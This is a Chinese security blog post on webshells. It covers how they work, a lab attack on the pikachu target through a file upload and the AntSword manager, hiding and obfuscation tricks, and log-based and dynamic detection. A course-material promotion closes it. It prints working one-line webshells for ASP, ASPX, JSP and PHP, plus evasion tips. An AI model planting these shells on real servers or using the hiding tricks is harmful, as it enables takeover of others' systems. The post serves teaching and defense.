网络安全-webshell详解(原理、攻击、检测与防御)

于 2024-04-29 20:43:32 发布
阅读量436 收藏 8
点赞数 19
分类专栏: 程序员 文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84252743/article/details/138324897
版权 
<%eval request ("value")%>

<% execute(request("value")) %>

aspx

<%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>

jsp

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

攻击

靶机:pikachu

工具:中国蚁剑

首先,利用文件上传漏洞,上传webshell文件

网络安全-文件上传漏洞的原理、攻击与防御_lady_killer9的博客-CSDN博客

文件为eval.php,内容为

<?php eval($_POST['eval']); ?>

之后利用中国蚁剑连接网站,空白处右键->添加数据

添加数据

添加数据成功

上传文件及其他功能

终端控制

再打开上传webshell的那个目录,可以看到多出来了%SystemDrive%目录,

目录变化

至此,可以进行文件管理,虚拟终端等。

WebShell管理工具

webshell隐藏

隐藏到日志

例如,修改发送数据包的头部,添加webshell。 web服务器一般会保存访问记录到Web日志,若找到web日志,且放到可执行目录下,可能获得shell。

隐藏到合法文件

例如,文件上传漏洞中,将php代码放到jpg文件中,可以使用@运算符,以防发生任何错误。

混淆

删除空格、换行符等,导致代码文件比较乱,使用编码或加密来隐藏掉恶意函数名等。

检测与防御

静态检测

web日志

在对日志文件进行预处理后,对日志记录进行文本特征匹配、统计特征计算与文件关联性分析,最后对检测结果汇总,列出疑似的Webshell文件。

例如,网站目录下某php文件访问量过少,且来源ip固定。

动态检测

webshell传到服务器了,黑客总要去执行它吧,webshell执行时刻表现出来的特征,我们称为动态特征。

例如,webshell如果执行系统命令的话,会有进程。

以上面的攻击进行防御举例

webshell扫描

点击执行操作

后门被删除

webshell文件被删除,但是%SystemDrive%目录还存在。

总结:攻击层面还应考虑如何绕过系统上传webshell,如何隐藏webshell免查杀,防御方面应该考虑如何避免webshell被上传,如何查杀webshell。

参考

webshell

webshell查杀

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84252743
关注
  • 19
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透学习-upload-labs靶场
04-20
网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础到高级,帮助新手逐步提升对这类漏洞的...
入侵服务器详解--很多关于服务器安全的内容
11-03
网络安全领域,"入侵服务器"是一个重要的话题,它涉及到服务器安全的方方面面。下面将详细解析这一主题,并基于提供的文件名称“入侵服务器详解.txt”来推测可能包含的相关知识点。 首先,我们要明白“入侵服务器...
WebShell攻击检测
yuanyuantuan的博客
12-08 5604
一、WebShell的危害 通过对“Webshell攻击”的整体分析,我们发现Webshell不知不觉为人们带来了很多危害,一旦黑客拿到了网站的WebShell,就可以修改网站的文件了!这样,网站将不再有秘密可言。如果入侵者通过执行命令,提升网站的权限后,就可以发展到入侵服务器,进而创建管理用户,达到控制整台服务器的目的。因此,无论是网站开发人员还是业界的同胞,都要提高对Webshell攻击的警惕,时刻关注网站是否存在漏洞,防止其被上传WebShell,造成严重的后果。 二、如何防御WebShell攻击
webshell攻击
YvesHe的专栏
10-14 558
webshell 使用服务器构造一个可执行的shell环境 https://baike.baidu.com/item/webshell/966625?fr=aladdin
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1463
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
WebShell入侵检测的相关技术
围城
03-31 753
2020/03/31 - 本文是阅读文章[1]之后的自己记录,请直接阅读原文更好。 文章[1]比较详细的记录了很多应该是安全人员使用的分析方法,虽然简单涉及了一些类似机器学习的方法,但是没有完整的说明。[1]中主要是对应对的方法进行了较为全面的介绍,可以作为知识面的扩充。 WebShell简介 入侵各种企业网站的时候,通常是利用各种方式来获取webshell。 常见的方式:直接上传获取web...
精品资料(2021-2022年收藏)云安全防护服务项目需求说明书.doc
10-11
安全防护服务旨在为互联网网站及税务系统提供全面的保护,通过结合基于云的漏洞库和智能攻击检测技术,实现一体化防御。以下是各项服务的具体要求: 1. **Web攻击防护服务** - 该服务主要针对多种Web攻击进行...
webshell提权教程
06-12
网络安全领域,Webshell是一个重要的概念,它通常指的是攻击者在目标网站上植入的恶意脚本,以便通过Web接口控制服务器或执行特定操作。本教程将深入探讨Webshell原理、常见类型以及如何进行提权操作。 一、...
蚁剑webshell链接工具
04-13
2. **安全研究**:研究人员通过蚁剑分析WebShell的特性,研究其工作原理,以提高防御策略。 3. **应急响应**:在遭受WebShell攻击后,安全团队可以使用蚁剑清理恶意代码,修复受损系统。 4. **教育训练**:在网络...
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
网络安全webshell攻击过程及解析
为安全而生,分享各类网络攻击及其应对方法
12-11 1400
Webshell攻击是一种黑客通过上传WebShell脚本到目标服务器,以获取服务器执行操作权限的攻击方式。WebShell是一种恶意脚本,通常以ASP、JSP或PHP等语言编写,可以提供攻击者对受攻击服务器的完全控制权。攻击者可以利用WebShell执行各种恶意操作,如浏览文件系统、获取服务器信息、上传和下载文件、执行系统命令、修改和删除文件等。
WEBshell与文件上传漏洞
LJH1999ZN的博客
02-19 4706
一、文件上传漏洞的原理 如果web应用程序对上传文件的安全性没有过滤和校验,攻击者可以通过上传webshell恶意文件对服务器进行攻击 。 二、文件上传的原理 1.有文件上传功能 2.上传文件的目录能解析脚本文件 3.能访问到上传的文件 三、文件上传攻击 文件上传防护和绕过手段 1.文件上传漏洞--绕过前端js检测 由于网站客户端对文件的上传类型做了限制,不允许我们上传.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可 ...
webshell
阳光梦的专栏
06-04 1453
漏洞原理                                                                                                 文件上传功能本身是一个正常的业务需求,对于网站来说,很多时候需要用户将文件上传到服务器,例如上传自定义头像,文件共享,发送邮件时添加附件,文件备份与恢复。所以“文件上传”本身没有问题,有
文件上传漏洞、WebShell防御及绕过利用、Web容器解析漏洞、编辑器上传漏洞
Hi~ 土拨鼠
12-29 1345
文章目录文件上传漏洞漏洞概述漏洞成因漏洞危害WebShell大马小马GetShell漏洞利用的条件PUT方法上传文件漏洞的防御、绕过和利用黑白名单策略安装upload-labs前端限制与绕过服务器端检测---MIME类型 文件上传漏洞 漏洞概述 文件上传是web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站等。如果服务器配置不当或者没有进行足够的过滤,web 用户就可以上传任意文件,包括恶意脚本文件、exe程序等,这就造成了文件上传漏洞。 漏洞成因 一方面服务器配置不当会
webshell是什么?网络安全攻防之webshell攻击
Galaxy_0的博客
12-29 2128
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。
web安全 - 文件上传漏洞
qq_53058639的博客
03-15 666
解释并执行了用户上传的脚本,导致代码执行 2) 上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为 3) 上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行 4) 上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈 常见的攻击方式就是攻击者上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力 案例。web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,
webshell检测工具
最新发布
05-15
WebShell是一种非常危险的黑客攻击工具,它可以在服务器上执行任意命令,使黑客能够控制受感染的服务器。为了保护服务器的安全,需要使用WebShell检测工具来检测服务器是否被感染。WebShell检测工具可以检测WebShell的存在,并提供清除方案,以确保服务器的安全。这类工具通常可以自动检测服务器上的文件,对于包含可疑代码的文件进行分析,并生成报告以告知管理员可能存在的风险。常见的WebShell检测工具有:Webshell-detector、PHP-webshell-detector、WebShellScanner、Webshellmanager等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值